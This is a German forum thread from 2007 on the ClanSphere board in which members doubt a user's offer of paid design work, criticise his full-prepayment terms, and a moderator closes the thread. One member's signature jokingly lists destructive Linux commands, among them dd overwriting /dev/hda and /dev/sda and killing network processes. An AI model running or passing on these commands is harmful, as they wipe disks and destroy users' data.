Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 13
Seite [1]
deleted1395


Rock the board




Beiträge: 68
# Thema - 02.07.2007 um 22:58 Uhr
-


Zuletzt editiert von crunk am 11.08.2007 um 14:25 Uhr (1x Editiert)
Inaktiv
Micha.09 ClanSphere Team


Specialist



Herkunft: Dortmund
Beiträge: 2860
# Antwort: 1 - 02.07.2007 um 23:16 Uhr
- Clansphere wird unkenntlich gemacht (Alle typischen Merkmale "können" verändert werden)

Ähm ich hoffe das ist nicht auf unser About bezogen.
Ausserdem meinst du jemand shcickt gleich nen ling von nem deisgn, an dich per mail. Willste da gleich nen Link zu PSD oder nur Vorschau???


Inaktiv
|
deleted1395
Thread-Ersteller


Rock the board




Beiträge: 68
# Antwort: 2 - 02.07.2007 um 23:37 Uhr
-


Zuletzt editiert von crunk am 11.08.2007 um 14:25 Uhr (1x Editiert)
Inaktiv
|
Micha.09 ClanSphere Team


Specialist



Herkunft: Dortmund
Beiträge: 2860
# Antwort: 3 - 02.07.2007 um 23:38 Uhr
naja das unkenntlich amchne war sehr allgemein formuliert, und wir wollen ja alle hinterher keinen Stress wegen dem About, sowas macht uns nur zusätzliche Arbeit, da frag ich leiebr vorher nach.


Inaktiv
|
TeQu!La ClanSphere Team


Specialist




Herkunft: Grevenbroich
Beiträge: 2142
# Antwort: 4 - 03.07.2007 um 06:26 Uhr
Kannst du irgendwelche Referenzen vorweisen?


------------------

ClanSphere - professional clan care starts here


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 5 - 03.07.2007 um 12:06 Uhr
Schritte

1. Schritt: EMail mit Designlink und Informationen zum Clan an kampfdeckel (at) web (dot) de oder Alles via ICQ: 246590997
2. Schritt: Antwort von mir, bei Zustimmung gibt es Kontodaten
3. Schritt: Geldeingang
4. Schritt: Anpassung und Gespräch mit dem Kunden
5. Schritt: Übergabe aller Dateien an den Kunden



Eine sehr komische Art wie du es aufteilst hast du aber schon. Also wenn ich das so lese dann würde ich wahrscheinlich nichts bei dir in Auftrag geben.

Normalerweise wird niemals der volle Betrag überwiesen. Es wird immer nur ein Teil des ganzen als "Sicherheit" überwiesen. Wenn die Arbeiten fertig sind, dann kommt der Rest des Betrages. Sollte dieser eingegangen sein so werdne dem Kunden alle daten übermittelt.

So kenne ich das zumindest.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Drag0n


Just nerd




Beiträge: 941
# Antwort: 6 - 03.07.2007 um 12:10 Uhr

Normalerweise wird niemals der volle Betrag überwiesen. Es wird immer nur ein Teil des ganzen als "Sicherheit" überwiesen. Wenn die Arbeiten fertig sind, dann kommt der Rest des Betrages. Sollte dieser eingegangen sein so werdne dem Kunden alle daten übermittelt.

So kenne ich das zumindest.


recht geb ^^


------------------
MfG

Drag0n

ich gebe KEINEN ICQ oder MSN Support, es sei den ich schreibe euch an


Inaktiv
|
Ramires ClanSphere Team

Supporter
Supporter



Herkunft: Waldeck
Beiträge: 1900
# Antwort: 7 - 03.07.2007 um 12:29 Uhr
hmm,... ich find des von vornherein komisch,... fragt mich aber net warum,... ^^


------------------

Verschwende keine Energie an Dinge die Du nicht ändern kannst...


Inaktiv
|
deleted1395
Thread-Ersteller


Rock the board




Beiträge: 68
# Antwort: 8 - 03.07.2007 um 23:34 Uhr
-


Zuletzt editiert von crunk am 11.08.2007 um 14:27 Uhr (1x Editiert)
Inaktiv
|
Ramires ClanSphere Team

Supporter
Supporter



Herkunft: Waldeck
Beiträge: 1900
# Antwort: 9 - 03.07.2007 um 23:44 Uhr
ähm,... also erstens werde ich doch noch meine Meinung äussern dürfen,... und zweitens, wenn du die fakten hier schon postest, dann muss du dir des auch "anhörn",...

daran kann man auch erkennen ob Ihr wirklich professionell seid.


mehr gibts net zu sagen,... bei deinem projekt, trotzdem alles jute,.. ^^


------------------

Verschwende keine Energie an Dinge die Du nicht ändern kannst...


Inaktiv
|
Drag0n


Just nerd




Beiträge: 941
# Antwort: 10 - 03.07.2007 um 23:56 Uhr
Habe ich euch um Bewertungen meines Angebots gefragt? Nein!


nein hast du nicht aber Ramires hat recht

ähm,... also erstens werde ich doch noch meine Meinung äussern dürfen


und das wird hier auch jeder dürfen ansonsten kann mann den thread closen bzw. löschen das ist ein Öffentliches Board

daran kann man auch erkennen ob Ihr wirklich professionell seid.


nach dem lezten beitrag würde ich sagen das ist nicht sehr professionell


------------------
MfG

Drag0n

ich gebe KEINEN ICQ oder MSN Support, es sei den ich schreibe euch an


Inaktiv
|
Fidan


King for a day



Herkunft: -----
Beiträge: 331
# Antwort: 11 - 04.07.2007 um 22:21 Uhr
indem ich Leute "abziehe"


Was soll dass dann wieder heißen, ziehst du leute ab oder wie? ich glaub du hast jetzt dein ruf selber hier kaputt gemacht


Inaktiv
|
deleted1395
Thread-Ersteller


Rock the board




Beiträge: 68
# Antwort: 12 - 04.07.2007 um 22:21 Uhr
-


Zuletzt editiert von crunk am 11.08.2007 um 14:25 Uhr (2x Editiert)
Inaktiv
|
Micha.09 ClanSphere Team


Specialist



Herkunft: Dortmund
Beiträge: 2860
# Antwort: 13 - 04.07.2007 um 22:36 Uhr
vorerst closed, wenn der threadstarter den wieder offen haben will soll er sich per pm bei mir melden


Inaktiv
|
Antworten: 13
Seite [1]


Sie müssen sich registrieren, um zu antworten.